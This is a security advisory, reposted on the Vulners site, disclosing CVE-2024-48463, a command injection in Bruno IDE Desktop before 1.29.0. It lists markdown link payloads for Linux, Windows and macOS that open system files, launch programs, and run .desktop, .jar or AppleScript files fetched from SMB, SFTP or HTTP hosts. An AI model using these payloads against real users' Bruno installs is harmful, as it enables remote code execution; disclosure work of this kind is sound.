Vulners
Lucene search
Bruno IDE Desktop Command Injection
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Bruno IDE Desktop Command Injection Vulnerability | 16 Jan 202500:00 | – | zdt |
 | CVE-2024-48463 | 4 Nov 202422:48 | – | circl |
 | Bruno 安全漏洞 | 4 Nov 202400:00 | – | cnnvd |
 | CVE-2024-48463 | 4 Nov 202400:00 | – | cve |
 | CVE-2024-48463 | 4 Nov 202400:00 | – | cvelist |
 | CVE-2024-48463 | 4 Nov 202421:15 | – | nvd |
 | PT-2024-33122 · Electron +1 · Electron +1 | 4 Nov 202400:00 | – | ptsecurity |
 | CVE-2024-48463 | 23 May 202506:22 | – | redhatcve |
 | CVE-2024-48463 | 4 Nov 202400:00 | – | vulnrichment |
=====[ Tempest Security Intelligence - ADV-10/2024
]==========================
Bruno IDE Desktop prior to 1.29.0
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents ]==================================================
Overview
Detailed Description
Timeline of Disclosure
Thanks & Acknowledgements
References
=====[ Vulnerability Information
]===========================================
Class: Improper Neutralization of Input During Web Page Generation
('Command Injection') [CWE-78]
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - 9.8
=====[ Overview ]===========================================================
System Affected: Bruno IDE Desktop
Software Version: All versions prior to 1.29.0
Impacts:
Vulnerability: A command injection vulnerability in the function
shell.openExternal of Bruno IDE Desktop prior to version 1.29.0 allows
attackers to execute arbitrary commands by supplying a crafted URL, leading
to potential remote code execution.
=====[ Detailed Description ]===============================================
Command Injection [PoC - Reproduction Steps]:
1. Launch Bruno IDE Desktop on any supported operating system.
2. Create a Collection and navigate to the Docs tab
3. Insert the following markdown payloads depending on the target OS:
Linux:
[passwd](/etc/passwd)
[smb](smb://localhost/public/x.desktop) - Malicious .desktop file
[sftp](sftp://user@localhost/home/user/s.desktop) - Malicious .desktop file
POC Video: https://www.youtube.com/watch?v=SPCGVLEfVgw
Windows:
[Calc](C:/Windows/system32/calc.exe)
If Java is installed, directly execute a malicious .jar file:
[exploit](http://localhost/pwn.jar)
[exploit](C:/Users/user/Downloads/pwn.jar)
POC Video: https://www.youtube.com/watch?v=KVwKQkXA-vI
macOS:
[calc](/System/Applications/Calculator.app) - Opens Calculator on macOS.
[calcFile](System/Applications/Calculator.app) - Another method to trigger
Calculator.
[exploit1](smb://10.211.55.6/public/hello.scptd) - Connects to a remote SMB
share and executes a script.
[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt) -
Executes a script from a mounted volume.
[file](///etc/hosts) - Reads the system’s /etc/hosts file.
[facetime1](facetime:+123456789) - Attempts to launch FaceTime with a
specific phone number.
[facetime2](facetime:[email protected]) - Triggers FaceTime using an
email address.
[tel](tel:+123456789) - Initiates a phone call via the tel: protocol.
[mail](x-apple-reminder://) - Opens the Apple Reminders app via a custom
protocol.
[calendar](calendar://) - Attempts to open a calendar application.
POC Video: https://www.youtube.com/watch?v=S0W93tbKaFY
4. Upon execution, the crafted URL results in arbitrary command execution
in the victim's environment.
=====[ Timeline of Disclosure
]==============================================
14/Set/2024 - Responsible disclosure was initiated with the vendor.
16/Set/2024 - Vendor acknowledged the vulnerability.
20/Nov/2024 - The vendor released a patch (version 1.29.1) addressing the
issue.
24/Out/2024 - CVE-2024-48463 was assigned and reserved.
=====[ Thanks & Acknowledgements ]==========================================
Tempest Security Intelligence [1]
Rodolfo Tavares - Vulnerability Discover
Filipe Xavier - Special Thanks
Henrique Arcoverde - Special Thanks
=====[ References ]=========================================================
[1] https://www.tempest.com.br
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://gist.github.com/opcod3r/ab69f36d52367df7ffac32a597dff31c
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-48463
=====[ EOF ]===============================================================
--
--
*Esta mensagem é para uso exclusivo de seu destinatário e pode conter
informações privilegiadas e confidenciais. Todas as informações aqui
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste
caso, por favor, notifique o remetente da mesma e destrua imediatamente a
mensagem.*
*
*
*This message is intended solely for the use of its
addressee and may contain privileged or confidential information. All
information contained herein shall be treated as confidential and shall not
be disclosed to any third party without Tempest’s prior written approval.
If you are not the addressee you should not distribute, copy or file this
message. In this case, please notify the sender and destroy its contents
immediately.**
*
*
*Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jan 2025 00:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.16.5
EPSS0.00204
SSVC